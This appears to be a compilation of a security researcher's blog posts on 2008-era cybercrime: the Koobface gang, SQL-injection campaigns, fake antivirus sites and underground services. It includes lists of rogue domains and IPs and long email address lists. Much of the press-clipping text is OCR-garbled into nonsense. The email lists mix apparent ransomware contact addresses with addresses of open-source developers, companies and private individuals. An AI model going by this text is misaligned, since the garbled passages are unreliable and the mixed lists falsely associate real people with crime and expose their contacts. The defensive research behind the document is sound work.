and greatly extend the lifecycle of their campaign taking advantage of the fact the the low 
profile site owners would remain infected and vulnerable for months to come. 


Related posts: 

[1]Embedding Malicious IFRAMEs Through Stolen FTP Accounts 
[2]Injecting IFRAMEs by Abusing Input Validation 

[3]Money Mule Recruiters use ASProx’s Fast-flux Services 
[4]Malware Domains Used in the SQL Injection Attacks 
[5]Obfuscating Fast-fluxed SQL Injected Domains 

[6]SQL Injecting Malicious Doorways to Serve Malware 

[7]Yet Another Massive SQL Injection Spotted in the Wild 
[8]Malware Domains Used in the SQL Injection Attacks 

[9]SQL Injection Through Search Engines Reconnaissance 
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Web Gang Operating in the Open 


By RIVA RKEDIOND JAN 4 DO 


Five men bobeved to be responsiiie for spreading a notorious computer 
worm on Facebook and other social networks — and pocketing several 
milion dollars from celine schemes — are hiding in plain sight in St. 
Potorsburg, Russia, according to investigators at Facebook and sevoral 
independent computer security researchers. 


The men live comfortable Eves in St, Petersburg — and have froicked on 
‘uxury vacations in places like Monte Carlo, Ball and, earlier this month, 
Turkey, according to photographs posted on social network sites — even 
though their idertities have been known for years to Facebook, computer 
security investigators and law enforcement officials. 


‘One member of the group, which is popularly known as the Koobface gang, 
has regularly broadcast the coordinates of its offices by checking in on 
Foursquare, a location-based social network, and posting the news to 
Twier. Photographs on Foursquare also show other suspected members 
Of the group working on Macs in a loftlie room that looks lke offices used 
by lech start-ups in CRes around the work, 


Beginning in July 2008, the Kooblace gang aimed at Web users with 
ienitations to watch a funny or sexy video. Those curious enough to click 
the link got a message to update their coenputer’s Flash software, which 
begins the download of the Kooblace malware. Victins’ computers are 
dratiod into a “botnet,” or network of infected PCs, and are sent official 
looking advertisements of take antivirus software and their Web searches 
are also hijacked and the clicks delivered to unscrupulous marketers, Tho 
group made money from people who bought the bogus sofware and tom 
unsuspecting advertisers. 


The security software firm Kaspersky Labs has estimated the network 
includes 400,000 to 800,000 PCs workiwide at ls height in 2010, Victins 
are often unaware their machines have been compromised. 
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Sony PlayStation site victim of 
SQL-injection attack 


Automated attack claims another high-profile target, offering 
sale of a fake antivirus scanner. 


y MOBERT VAMOS § poLy 2. 20081) 68 AM POT t a = = = 


motoz 


to the Sony PlayStation ste may have been prompted to download an 
antivirus scanner 


3 Early Wednesday, antivirus vendor Sophos reported that some visitors 


Pages promoting the PinyStation games SingStar Pop and God of War contained 
SOL-injected code, Visitors to those specific game pages would see a tnke 
omivirus scan, then 4 message that the computer was infected with different 
viruses and Trojan horses, Warned, the user would then be asked to purchase the 
scanner to remove the bogus malware. 


The injected code linking to the scanner has since been removed 
Sophos said the attack coud have downloaded malicious payloads, but dki not 


Security researcher Doncho Danchey said in his ZDNet blog that Sony wasn't 
dlone, It was one of 794 domains Nit in the lntest outomated SOL-injection 
Campaign using 4 mumieyer tnst-fux superstructure built around coktwop.com 
Over the last 90 days, Google reports that 794 domains have been infected with 
code pointing to that domain. These are legitimate sites with vulnerabilities that 
allow criminal hackers to inject code pointing to ther servers. 


The Cybercrime Economy 


NBC hack infects visitors in ‘drive by' 
cyberattack 


by Julianne Pepitone @julpepitone 


(4) Fetruary 25, 2055 951 AM ET =mOOG000 
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Fake CNN Alert Still Spreading Malware 


@0000090 


By Gregg Mere 


rr) 


The massive attack that has tected PCs by trcking users to choking Inks 
in take messages trom CNN.com shows ithe sen of ending soon. secunty 
researchers tay 


According to WK Loge ine. , spare posing as CNN.com Top 10 lets peaked at 
ote 11 milhon messages per hour early Thursday, but remained at hgh 
vores Deoughout the day Friday The Colorado security vendor sad ¢ had 
been backing an average of 8 millon messages per hour ance mudreght. 


WX Loge’s wice president of mlormation securty, Sam Masel , called the 
trend “a very slow, but steady decline” tom the 11 a.m. Mountain Time peak 
the day betore 


| Further padi Pine he mee age of antivir SoMmne ae groment yo OC | 


Maelo aio sad Dat Te span has Changed since attacks were fest 
launched on Tuesday “We've also seen several morphs of Tes span over the 
past couple of days.” he sad in an entry posted on Me WK Loge biog Fretay 
Where the messages once trumpeted * Ch com Daly Top 10° in he 
Subpect Moading and bred to a srgie Mename on maleate hosing Stes row 
the span sports a suiyect reading “CNN Alerts: My Custom Alert and uses a 
vanety of Meramres in Te matoous URL 


“Thes os baoly 9 response to all of The eda aflerten ard awareness Pat has 
been brought up over the past couple of days.” Masiello speculated 


Also on Friday, Websense inc reported that ts researchers had seen the 
attach mutating. with the spam subject heading not only touting “CNN Alerts 
My Cuntorn Alert." but aino using legitimate news stones cued trom CNN to 
make the messages more comvimcng 


Users who ciched on the "FULL STORY” irk in the message mere redirected 
to a take CNN 680. where they were told they needed t9 download an update 
to Flash Paryper, Acobe System inc 'S pogetar Internet mecha player. to view a 
video clip from CNN. 


Websense also said # had spotted traces of the campaign in blog sparn 


tpeneeroetoct 
2 RUE ret Ne Cal ted Cem ntove he rene 
d Fm teen Uy tag fates tena Wm trreenge Sor baey ) remain et 


Aoeorees Deut kee Oks tery Se mtO reat ey 


tt users agreed to download the bogus Flash update. hey were trapped man 
endiess loop, where clicking “Cancer” in the intial dialog produced a second 
popup. Clicking “Cancer” there returned the user to the fest pop-up. The only 
optors af thal port were for users fo shat Gown the browser of ge nm and 
install he malware 


MX Loge acted fut ¢ had seen he UR.s m De spam lead to legtienate 
domans that had probably been comprormsed. and named a UK based 
rooting Company at an example 


Earher thea weet. Busnarun seourty seaqarcher Dacha Danchey Mad found 
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OPINION 


Crimeware gets worse - How to 
avoid being robbed by your PC 


0@0600000 


Tho maiware threat to Windows computers continues to get worse, So much — MOBF LIKE — 
80, there's a new term to describe maicious software that transfers money Being alert , 
from online accounts al financial services companies - crimeware. 

| want to like Linux, but it keeps tailing on 
Last week, an article at Technology Review toki about a construction firm that me 


had $447,000 taken out of their bank account by crimeware software on one Cyber attackers empty business accounts 


of their computers. What makes this story particularly interesting is that the i mirnnes 
unnamed bank employed one time passwords. az 

The tate of Apple's Touch ID 
Perhaps you've seen the small key fobs that display a new password every | Tech Talk Ep 1 


minute. If you don't have the key fob, you can't logon. But the computer was 
already infected ard was being used by a legitimate user. Retina scanners 
would not have prevented the crime. 


While the well-verified user was logged on, making legitimate transfers, the 
crimeware sottware generated 27 transfers in the space of a few minutes. 
According the firms president “They not only got into my system here, they 
were able to ascertain how much they coukd draw, so they drew the limit”. 
can't get any worse. 


What to do? 


Dancho Danchey suggests setting “daily, weekly or monthly account 
transaction limits”, assuming your financial institution allows &t. He also 
suggests being notified of transactions via SMS. 
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(Pdenes motile members phone OD rumbers he names of he cere, Brainy ree sige 
ard Pe asscoated motte opersios among other formation Users of vis poor dene 
(he tool can choose wtuch country Pay want to target RD cegrny toss rcresory 
The harvested rtormation 1 lane Used for earat Manco and or 
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Preaded somawre stewing up tb 100 "Wuheuing streams”. as wet as an 
CE No Cotte! Cty Umber atinc tied 8 a pattouar motte proveber 


“Dydercriminats and spartmers are not strangers to he concept of 
(market segmentation * expiared Oancho Oanchey 2 securty swiearcther 
At Wertroct, ma biog post 
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‘The OFY phone number harvesting tool i an exempta of 2 wider Pend of 
teling toon Pat once were erckervely aratatee to scptstcated 


cybercremnais to lens elte cybercrocas Dough undergourd lous 
Servoes Pat ofer: a means to Wurch maraged SMS fooding and 
shone reg foodie have recety become aratatee trougt ete: 
forma Bo managed SMS flooding and phone rng flooding are pitches 
‘8 2 means to lake Care of your Competior’s phone Ines’ or a D005 
s@ack On phones ratead of webeter However, Deve terces mgt 
panty lend Demaeters to hoping slong More aréibous scams such as 
fooding out a barat cal centres to prevent earty reports of card baud 
cab ot operators according bo Webroot 


“Wy Starting to acvertse Deve very tame matcions (O1Y) tools and 
LervCes On ptiicly acceteible forums, Dey re proving Dat hey re ating 
1% bacrice 3 cota Gegree of OPSEC (Operational Searty) tor De 
bane of growing er Daness model and atractrg nee cuatomers.” 
Darches repo 
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The Rise of Malware as a Service (MaaS) 


February 18.2013 « botnets, images sottware 


gogon :: 


© mitors Merkag Pagers 


‘The Internet in becoming o mine Ror criminats that tt an easy mary to access 10 ary Rind Of rescunces OF to arrange a Cyber attacks. @ cyber 
OOO A CAPR OF COREE Carer OO NPE 


\Whall 6 very tagntereng is he senptoty eth erech f 6 pOSSmMe te BOqETe any Rind Of CHIINUE SerVides In Re ern and The Creatyty of 
cyber creminats st are able to offer a business mode! That | bom eficert anc inexpensive This is especially tue of the Russian creminal 
Underground mftich ts fhe one that m considered fhe mott active gobaity 


ih the lnat mort) warcus matcious carpages Mave been laurched by Cyber Crrnais alh speciic tert to tect he largest nurrber of 
mactenes compening dangerous (0 <5 The avanansites of @ great mumber of NeeCted muncrunes Trarnsintes HO The OVaEACsiTy Of vRUOE 
TOSCLTCOS and bervices to De marketed by ©yOercor™" ongarerations 


Cyter crmunais are cttering manware réected Notts, aio Known as Toads” Fh a new DUERESS model Tut propoLes he Monetraton of totret 
actGes Trou renting of he compromised systems Of course the services ofleres are tctally customiratie. cBerts can choose the type of 
Pakenre Thal AOCRS The WCE and Ther Qrograptie bcator. & Is POSSE Kent US Dated makeare MMected nosis or madre in Europeans 
Une 


Securty expen Dancno Dancners in a po! On Wretroct Treat Stag revealed Meaty lnnched undengournd service Ofer accent t Masands 
of matware-rfectes machine tor unsetlingly low proes a ousand US Sased tests costs $200 meanwhile for a houtand EU based hosts 
price varies Detween $409120, and Ihe prite tor & Trousand ternational mix type of hosts ts $20. 


[10]Google Hacking for Vulnerabilities 

[11]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
[12]Sony PlayStation’s site SQL injected, redirecting to rogue security software 
[13]Redmond Magazine Successfully SQL Injected by Chinese Hacktivists 


1. http: //ddanchev. blogspot . com/2008/03/embedding-malicious-iframes-through. htm 


http: //ddanchev.blogspot .com/2008/03/injecting-iframes-by-abusing-input.htm 


. http: //ddanchev.blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 


http: //ddanchev. blogspot .com/2008/05/malware-domains-used-in-sql-injection.htm 
http: //ddanchev.blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 


http: //ddanchev.blogspot.com/2008/07/sql-injecting-malicious-doorways-to.htm 


NOURWN 


http: //ddanchev. blogspot . com/2008/05/yet-another-massive-sql-injection.htm 
8. http: //ddanchev .blogspot . com/2008/05/malware-domains-used-in-sql-injection. htm 


9. http: //ddanchev.blogspot .com/2007/07/sql- injection-through-search-engines .htm 
10. http://ddanchev. blogspot .com/2007/05/google-hacking-for-vulnerabilities.htm 
11. 
12, 


13. http://blogs.zdnet .com/security/?p=1118 


4.8.16 A Diverse Portfolio of Fake Security Software - Part Two (2008-08-19 07:54) 


With scammers continuing to introduce new typosquatted domains promoting well known 
brands of rogue security software that is most often found at the far end of a malware cam- 
paign, exposing yet another diverse portfolio of last week’s introduced domains is what follows. 


Naturally, in between taking advantage of the usual hosting services, most of the do- 
mains remain parked at the same IPs, this centralization makes it easier to locate them all, 
then having to go through several misconfigured malicious doorways that will anyway expose 
the portfolio. 
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Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality take scans 
victims, Group-IB researchers said 
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Oy Lucien Constanen 


t can be used in fraud atiacks to inpersonate 


Anew Wet tased service tor cybercrminats atomates the creation of take 
scanned documents Put can help taudsters bypass the centty verification 
PrOCESLES Une by tome barks. @-commerce bummesses and other onine 
pervices providers. according i researchers from Russian cybercrene 


mrevigntons tem Grape B 


The service Can generate scanned copes of passports, ID cards and driver's 


hoerses from Stererst ¢ 


punts ty denthes supped by the service users. take 


Scanned tity bls foe various 


parves. as wel as take scanned comes of 
artery Saternerts and Cred! Cards maved Dy a lange numer of bares sad 


Arverey Kormaroy head of ternational proects at Group wa ernad 


Ris common practice tor barks, payment and money arate providers, ontine 


garrbiing ates and other types of busresses Thal engage n money ransactors 
Wi the Internet to ach their cuttomers for scanned copies of docurnents in order 
to prove thee certiies or verty ther pinsical addresses, eupecually mhen ther 

ar® baud Gopatirents Getect suapccut accourt activity 


[ Retsted: 4 pices to find cybersecurity talent in your own organization} 
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N SoMeme 1 PUNE Te LOD Pare aed Cer cietans 
on a stanmed ID 6 COwouty Not a new practice, Dut services lke he one 
erties by Group IB Put atomate the whole process and produce hugh quailty 
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was launched 1 rad Aust Komarow sind 


InGepercent cyercmme researcher Dancho Oanchey Gescrbes a very seniar 


Bervice in a Jy biog post: howewer, Komarov coukd not contin whether t is the 


Sarre one because There mas no reference to the service's domain name 


Danchev's report 


The service found by Group 18 has templates tor passports. ID cards 


a) 
@iver's loenwes for he U.S Canada, Russia, he UK. Germany, he 
Netreertareds arid other European Urvon cGuntnes f alo Mas ternptates tor Dare 


Statements. credit cards ~ thont and Dack — ard utility bills tom Banks and utility 


COMPRES OPErAtiNg in those COUNTIES 


The ternpiates are for documents and cards that show signs of use and are 
scanned at dilererct anges and dferert posiers on the canvas Ths makes 
fhe resting erage appear more atherix 
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Customizable Mobile Number Harvesting 
Service Found on Underground Market 


ot tone ertvr 


Secunity experts Mave come across 2 new mobile amber harvesting service 
‘that allows uiers bo fully Customize the type of information they want to 
cotlect. The collected information can then be villized to drive SMS spam 
Campaigns that rety on specialized services, 
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Sony PlayStation site victim of 
SQL-injection attack 
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sale of 6 fake antivirus scanner 
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Crimeware gets worse - How to 
avoid being robbed by your PC 
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The malware threat to Windows computers continues to get wore. So much 
0. Tere's a new term to describe makoous sofware that traniters money 
oem Online BOCOUNES at franca! LERNCeS COMPANIES - Cremewatt 


Last week, a9 article at Tex ~ay Rienew told about a constucten fiers that 
had $447,000 taken of of thew Bark account by creneware soMeare on one 
of Ter computers. What makes thes story pattoulaty eteresing 6 Pat he 
Ururned bana enpioyed one Ime passwords 


Perhaps you've seen the smal hey fobs that Gapiay a new password every 
minute, If you don't hawe the key feb, you can? logon. But the computer was 
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Can get anny worse 


What & do? 
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The Rise of Malware as a Service (MaaS) 
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Stay tuned! 


1. https://ddanchev.blogspot.com/2019/09/historical-osint-dancho-danchevs-media.htm 


17.10.4 Dancho Danchev’s RSA Europe 2012 - Presentation - Sample Random Screen- 


shots - An Analysis (2021-10-02 11:20) 


An image is worth a thousand words. 
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Make the seach to XP antwrus Protecton and ergoy 
your syslemn work without any infuence cf spyware and wruses. 


@ Antivius2008 Pro 


TRY FREE NOW! 


@ srot ors rerum Brsress @& treroraes @ Tecrrowgy wersing 


How Antivirus 2008 PRO can help you? 
Apivirus 2006 PFO is Oesigned to Quarartee he 

heghest level of protecton azaenst virus Preats and 

MabOous spyware 


Atinitus 2006 PFO hechnstogy protects you fom 
Inawn and novel ruses and matcous programs. and 
Gives fut reat-tene protecBon for your PC 

Viruses ang matcious programs can bead to your 
System showdown Meeses and crashes 

Keep pour system FREE tom viruses. adware. 
Malware Soywaee and oer Meats! 


Repaw & Opemnce your PC win An@erus 2008 PRO 


Try Antius 2008 PRO now! 


antivirus2008t-pro .com - (91.203.92.64; 78.157.142.7) 
antivirus2008pro-download1 .com 
antivirus2008pro-download2 .com 

scanner.antivir64 .com 

antivirus2008t-pro .com 

antivirus-2008y-pro .com 


systemscanner2009 .com - (89.18.189.44; 208.88.53.114) 
xpdownloadserver .com 

global-advers .com 

xpantivirus .com 

updatesantivirus .com 

windows-scannernv .com 
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MP Protection 


software 7 


Not satisfied with your current Windows antivirus g 


Make the switch to XP antheus Protection and enjey your 
syitem work without any inflaence of spyware and viruses 


Solutions for: 


¢ Home and Home Office 
mal and Medzan Business 


<fe 


TRY FREE 


Home 
About Product 
Downed 


Regster Now 


Sgpert 


3 How XP antivirus can help you? 


XP antivirus & designed to provide you with the highest level of protection 
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Stay tuned! 


17.10.5 Happy Friday! (2021-10-02 11:20) 


Dear blog readers, 


I’ve decided to share some personal photos from yesterday’s party. Approach me at dan- 
cho.danchev@hush.com 
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Where’s the business model here? Where it’s always been, upon installation of the rogue 
security software, the malware campaigner earns up to 40 % revenue from the rogue security 
software’s vendor. 
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4.8.17 DIY Botnet Kit Promising Eternal Updates (2008-08-20 10:28) 
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Among the main differences between a professional botnet command and control kit, and one 
that’s been originally released for free, is the quality and the clearly visible experience of the 
kit’s programmer in the professional one. 


A Chinese hacking group is offering the moon, and asking for nothing. And in times 
when a cybercriminal can even monetize his conversation with a potential customer by telling 
him he’s actually consulting them and barely talking, is this for real and how come? This 
"Robin Hood approach" on behalf of the group could have worked an year ago, when greedy 
cybercriminals were still charging hundreds of thousands of dollars for their sophisticated 
banker malwares. Today, [1]most of them leaked in such a surprising, and definitely not 
anticipated on behalf of the malware coders way, that not only they stopped offering support 
and abandoned their releases, but what used to be available only to those willing to open 
their virtual pocket and transfer some virtual currency, is available to everyone making such 
free botnet kits irrelevant - mostly due to their simplicity speaking for zero quality assurance 
we can see in professional kits. 


Once the dust settles on this populist underground release, its potential users would 
once again return to their localized copies of web based botnet command and control kits. 
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1. http://blogs.zdnet .com/security/?p=1598 


4.8.18 A Diverse Portfolio of Fake Security Software - Part Three (2008-08-20 10:55) 
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One would assume that once you’ve managed to trick leading advertising providers into 
accepting your malicious flash ads inside their networks, you would do anything but hijack the 
end user’s clipboard and rely on their curiosity in order to direct them to your fake security 
software site. [1]ls the curiosity approach working anyway? Naturally, thanks to the effect of 
"regressive Darwinism". 


Compared to [2]February, 2008’s malicious advertising (Malvertising) attack, the [3]cur- 
rent one is less comprehensive and not so well thought of - [4]thankfully. 
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What these campaigns have in common is the [5]fake security software served at the 
bottom line, next to the malware campaigners persistence in introducing new domains, like 
the very latest ones : 
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johnsonwhate@tutanota.com 
A654763764@qq.com 
decrypter02@cumallover.me 
piterpen02@keemail.me 
jimmtheworm@dicksinmyan.us 
newrecoverybot@pm.me 

sqlbackup3@mail.fr 

doctor666@mail.fr 

newrecoveryrobot@pm.me 

doctor666@cock.li 

repairdb@seznam.cz 


repairdb@mail.fr 
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decryptor911@airmail.cc 
decryptor666@420blaze. it 
doctor777@mail.fr 
RemotePChelper@cock.|i 
remotePChelper@tutanota.com 
BCPFILE17@tutanota.com 
returndb@seznam.cz 
returndb@airmail.cc 
support911@cock.li 
xilttbg@tutanota.com 
doctorhelp2120@cock.li 
repairdatadochelp@airmail.cc 
returndb@airmail.ee 
1lrestOre@protonmail.com 
lrestOre@cock.|i 
cryptolifeguard@cock.li 
unlOck@keemail.me 
8472host@mail.fr 
8472host@cock.li 
legalrestore@tutanota.com 
host2021@tutanota.com 
aid.keepcalm@seznam.cz 
aid.keepcalm@protonmail.com 
skgrhk2018@tutanota.com 
skgrhk2018me@tutanota.com 
sqqsdr01@keemail.me 
name4v@keemail.me 
dfs20@keemail.me 
styver.goodman@aol.com 
maktoob786@takfir24.net 
haraam@takfir24.net 
haraam@alayam24.net 
blackpanda007@torbox3uiot6wchz.onion 
btc.freshOlL@gmail.com 
unixc47@gmail.com 
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d3g1d5@gmail.com 
khiwosang@gmail.com 


MildredRLewis@teleworm.us 


ZaszyfrowanePliki@ZaszyfrowanePliki.us 


decry1@cock.li 
decry2@cock.li 


BM-2cTzz6rwtd8d7qd1wVegH6sZ44GbNPV8Li@bitmessage.ch 


ransomware@sj.ms 
randomlocker@tuta.io 
rebushelp@airmail.cc 
rebushelp@protonmail.com 
rebushelper@exploit.im 
cryptghOst@protonmail.com 
160505@tt3j2x4k5ycaa5zt.onion 
kvlly@protonmail.ch 
iohw634@gmail.com 
decryptmefinger@gmail.com 
backuppc@tuta.io 
backuppc@protonmail.com 
backuppcl1@protonmail.com 
b4ckuppcl@yandex.com 
b4ckuppc2@yandex.com 
backuppcl@dr.com 
TimisoaraHackerleam@protonmail.com 
m4xroothackerteam@protonmail.com 
Vitaly. Yermakov@protonmail.com 
VitalyYermakov@cock.li 
UnlockAlexKingman@protonmail.com 
hellstaff@india.com 
soetrisno.bachir@kein.go.id 

support wc@bitmessage.ch 
ik253@email.vccs.edu 
MilesFlannagan@protonmail.com 
auuahk@yandex.com 


ouuohk@eclipso.eu 
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barracuda@airmail.cc 
barracudahelp@protonmail.com 
barracudahelper@exploit.im 
cryptlocker@tutanota.com 
crypto wannacash@protonmail.com 
help73@tutanota.com 
help73@protonmail.com 
buratino@cock.li 
thyrexsuck@cock.|i 
lovelife@cumallover.me 
lovelife@xabber.org 
onlymoney@firemail.cc 
supermax@cock.I|u 
nichegolichnogo@airmail.cc 
clubnika@elude.in 
lisasu@elude.in 
clubnika@cock.li 
safronov@cock.|i 
safronov123@tuta.io 
mylifeisfear@cock.li 
netakaykakvse@cock.li 
euphoria-help@elude.in 
omygosh@cock.li 
itstome@cock.li 
petrov441@protonmail.com 
johnstang@zoho.eu 
johnsmith987654@tutanota.com 
t314.520@qq.com 
omg-help-me@openmailbox.org 
backdata@cock.li 
passsenderdec@gmail.com 
rsupp@protonmail.ch 
rupp@protonmail.ch 
decryptscrabber@mail.ru 


scrabber@mail.ru 
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No matter how fancy malvertising is in respect to demonstrating the creativity of mali- 
cious parties wanting to appear at legitimate sites by abusing their advertising providers, 
there are far more efficient tactics to do so. 


1. http: //siteanalytics.compete.com/xp-vista-update.net?metric=u 


2. http: //ddanchev. blogspot .com/2008/02/malicious-advertising-malvertising.htm 


3. http: //sunbeltblog. blogspot .com/2007/11/rogue-ads- on-ad-networks.htm 
4. http: //ddanchev. blogspot .com/2008/05/malware-attack-exploiting-flash-zero.htm 


5. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 


4.8.19 Fake Celebrity Video Sites Serving Malware - Part Two (2008-08-21 08:52) 
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Malicious parties remain busy crunching out domain portfolios of legitimately looking celebrity 
video sites. The very same templates used on the majority of [1]fake celebrity video sites 
which | exposed in a previous post, remain in circulation with anecdotal situations where 
they aren’t even bothering to match the site’s logo with the domain name - it would ruin 
the malicious economies of scale approach. And since centralization to some, an laziness to 
others, remains in tact, the fake security software and fake codecs served remain once parked 
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>) WATCH VIDEO 


filekerk@tutanota.com 
yougame@protonmail.ch 
swordofsakura@india.com 
krupalupium@india.com 
brianmaps@gmail.com 

amigo a@india.com 
desktopmain228@india.com 
care _nim@tutamail.cc 
desktopman228@india.com 
decrypteasy@protonmail.cc 
kreker@india.com 
filesharper@420blaze. it 
cricket@tutanota.com 

data safe@mail.com 
datasafe@airmail.cc 
dec.service@protonmail.com 
nmare@cock.li 
incognitoman@protonmail.com 
siniyzabor@protonmail.com 
schusterboss@dnmx.org 
openthefile@mailfence.com 
Loberoper@gmail.com 
nLoberoper@gmail.com 
speerunto@gmail.com 
ncharlieAdmin@mail2tor.com 
auPlombiren@hotmail.com 
123@tutanota.com 
webmaster@pcthreat.com 
insupport@messagesafe.io 
ripntfs@protonmail.com 
securityitl23@protonmail.com 
potentialenergy@mail.ru 
chinarecoverycompany@cock.li 
chinarecoverycompany@airmail.cc 
2020@outlook.com 
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2020@cock.li 
customerservice@safecart.com 
support@safecart.com 
shopper@esellerate.net 
daniel@haxx.se 
jack@greensock.com 
support@enigmasoftware.com 
gdpr@enigmasoftware.com 
help24decrypt@cock.li 
volcano666@tutanota.de 
ordersupport@mycommerce.com 
ordersupport.ja@mycommerce.com 
ordersupport.es@mycommerce.com 
ordersupport.pt@mycommerce.com 
ordersupport.it@mycommerce.com 
ordersupport.de@mycommerce.com 
ordersupport.fr@mycommerce.com 
ordersupport.nl@mycommerce.com 
ordersupport.cn@mycommerce.com 
ordersupport.zh@mycommerce.com 
coronaVi2022@protonmail.ch 
coronavi2022@protonmall.ch 
affiliates@shareit.com 
lokesh.aero@gmail.com 
uupaa.js@gmail.com 
jseward@bzip.org 
giuseppe@iuculano. it 
hpa@zytor.com 

srivasta@debian.org 
sds@epoch.ncsc.mil 
d.paleino@gmail.com 
mjg59@srcf.ucam.org 
noodles@earth. |i 
gandalf@le-vert.net 
openssl-core@openssl.org 
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jloup@gzip.org 
madler@alumni.caltech.edu 
djwong@us.ibm.com 
simshawj@us.ibm.com 
bikko@us.ibm.com 
sos@FreeBSD.org 
rob.groves@btinternet.com 
decryptyourdata@qq.com 
info@bestsecuritysearch.com 
konxnobx@tutanota.com 
repter@tuta.io 
0x1service@protonmail.com 
5ss5c@mail.ru 
prometheushelp@mail.ch 
reply@forgetit.com 
supportperiox@ywtpdnpwihbyuvck.onion 
matrixBTC@keemail.me 
Cusapool@firemail.cc 
zezoxo@libertymail.net 
togerpo@zohomail.eu 
rkmr121@rediffmail.com 
ravenheim@hotmail.com 
meme71973@hotmail.com 
mundus@newmail.dk 
siongkin@hotmail.com 
kandagatla_sandeep@yahoo.in 
san _goko@yahoo.com 
sasuke of the uchiha@hotmail.com 
veritasgeek@yahoo.com 
airbusbtc@goat.si 
fuckparadise@heniiv.com 
onim72031@yandex.ru 
anonimus.mr@yahoo.com 
ciastko.zlukrem@gmail.com 


microsoftxyber@hackindex.com 
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guardbtc@cock.|i 

Tors@tuta.io 
cashdashsentme@protonmail.com 
tomascry@protonmail.com 
charmant@firemail.cc 
Keyfiles@cock.|i 
SafeGman@protonmail.com 
Corpseworm@protonmail.com 
Salesrestoresoftware@gmail.co 
dfvdv@tutanota.com 

your last chance@thesecure.biz 
your last chance _help@elude.in 
Fetmyfilesback@airmail.cc 
decrypttos@cock.|i 
SecurCyber@yahoo.com 
Anonymous1@metronet.hr 
dresdent@protonmail.com 
Cryfixfoo@qq.com 
Blackdragon43@yahoo.com 
NetGanster@protonmail.com 
unlockdata@foxmail.com 
Merosa@india.com 
callmegoat@protonmail.com 
Donaldtrump@rapidteamail.com 
cryptor55@cock.li 
Dr.crypt@aol.com 
aq811@tutoanota.com 
pizdasobaki@protonmail.com 
cryptoplant@protonmail.com 
undogdianact1986@aol.com 
payadobe@yahoo.com 
aztecdecrypt@protonmail.com 
jakie.nunes@tutanota.com 
decryptgarranty@airmail.cc 
Cyberwars@qq.com 
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yoursalvations@protonmail.ch 
Grizzly@airmail.cc 
incongnitoman@protonmail.com 
InkognitoMan@tutamail.com 
Unlockmeplease@cock.|i 
btcdecripter@qq.com 
petropasevich@aol.com 
blacklist@clock.li 
castor-troy-restore@protonmail.com 
savefiles@india.com 
horsia@airmail.cc 
synack@secmail.pro 
Recover@8chan.co 
wlojul@secmail.pro 
ffgghtdfg@cock.li 
wog@onionmail.info 
TheZenis@Tutanota.com 
recoverfile@mail2tor.com 
jewsaintpeople@india.com 
vurten knyert@protonmail.com 
regem _regum@aol.com.onion 
recoveryl@writeme.com 
Dsupport@protonmail.com 
truongquocvi@gmail.com 
Julian.soto@gmail.com 
Noreply@kpnmail.eu 
abu.khan@india.com 
Blammo@cock.|i 
Decrypthelp@qq.com 
Cho.dambler@yandex.com 
dongeswas@tutanota.co 
Blacknord@tutanota.com 
Helper023@cock.li 
Decryptutility@protonmail.com 
keyforyou@tuta.io 
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Apple.pass@mail.com 
Applehelp@caramail.com 
Agella@scryptmail.com 
haizenberg@aol.com 
Mk.goro@aol.com 
hallome@tutanota.com 
hjelp.main@protonmail.com.de 
dresdent@protonmail.co 
eladovinl1975@protonmail.com 
Btcdecoding@foxmail.co 
unlockdata@foxmail.co 
Filecode99@cock.li.ar 
return.data@qq.com.ar 

cl _crypt@aol.com.cl 
MerlinWebster@aol.com.com 
Honeylock@cock.li 
cyberunion@tuta.io.cu 
ponce.lorena@aol.com 
admin@spacedatas.co 
ponce.lorena@aol.co 
daves.smith@aol.com 
cybergroup1@aol.com 
Onecrypt@aol.com 
audrey.b@aol.com 

restore service99@scryptmail.com 
my _service@scryptmail.com 
Supportdecrypt@firemail.cc 
jundmd@cock.li 
oovro@aol.com 

traher@dr.com 
lolitahelp@cock.li 
ru9944@yandex.ru 
datastore2018@mail.ru 
Cryptmanager@protonmail.com 
Blacklist@cock.li 
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Mammon-decrypt@protonmail.com 
Light Yagami@tuta.io 
mr.dec@tutanota.com 
mr.dec@protonmail.com 
gardengarden@cock.|i 
JoniCarter@protonmail.com 
servicedeskpay@protonmail.com 
recfiles@protonmail.com 
Patagonoa92@tutanota.com 
Worldcry@cock.li 
szem@tutanota.com 
Peekabooo@qq.com 

help _911 support@rambler.ru 
help@tutanota.com 
Szems@tutanota.com 
xzet@tutanota.com 
systems@tutanota.com 
partytime1l23@default.rs 
Recoverfiles2017@qq.com 
Ncrypt@cock.li 

Mich78@usa.com 
wyna@nyu.edu 
Redshitline@india.com 
nowayout@sigaint.org 
Becky.cely2@aol.com 
Cryptomafia@tuta.io 
MerlinStusan@protonmail.com 
Zakripper@mail.com 
loybranunun1975@protonmail.com 
checkcheck07@qq.co 
cybergroup1@aol.co 
Support@qbmail.bi 
Babyfromparadise666@gmail.com 
youneedmail@protonmail.co 
thewiz6688@sigaint.org 
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akzhq808@tutanota.com.ma 
payday@tfwno.gf.ht 
Decrypthelp@qq.co 
kumarrohitl101986@gmail.com 
admin@jasinga.com 
jasingadotcom@gmail.com 
dian.nugraha@gmail.com 
info@service.comms.yahoo.net 
gorentos@firemail.cc 
restoredjvu@india.com 
restoredjvu@firemail.cc 
pdfhelp@firemail.cc 
support@sensorstechforum.com 
kokoklock@cock.li 
easybackup@aol.com 
flydragon@mailfence.com 
grand@horsefucker.org 
helpnetin@protonmail.com 
neural.net@tuta.io 

sill@tuta.io 
velasquez.joeli@aol.com 
zfile@tuta.io 
Killback@protonmail.com 
mattpear@protonmail.com 
3442516480@qq.com 
Admin@adsoleware.com 
blackhatcyber789@gmail.com 
Centrumfr@india.com 
Centurion Legion@aol.com 
Crptlomand@india.com 
Epta.mcold@gmail.com 
File2@openmailbox.org 
hannesschubertO@gmail.com 
heineken@tuta.io 
ix@hotmail.com 
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Repair data@cryptmail.com 
Sherminator.help@tutanota.com 
Ssimpotashka@gmail.com 
unblocked@email.su 
Veracrypt@india.com 
wtfsupport@airmail.cc 
xser@tutanota.com 
Yourencrypter@protonmail.ch 
admin@fentex.net 
Basecrypt@aol.com 
lindsherrod@taholo.co 
1-charlieAdmin@mail2tor.com 
2-charlieAdmin@mail2tor.com 
3-charlieAdmin@mail2tor.com 


4-charlieAdmin@mail2tor.com 


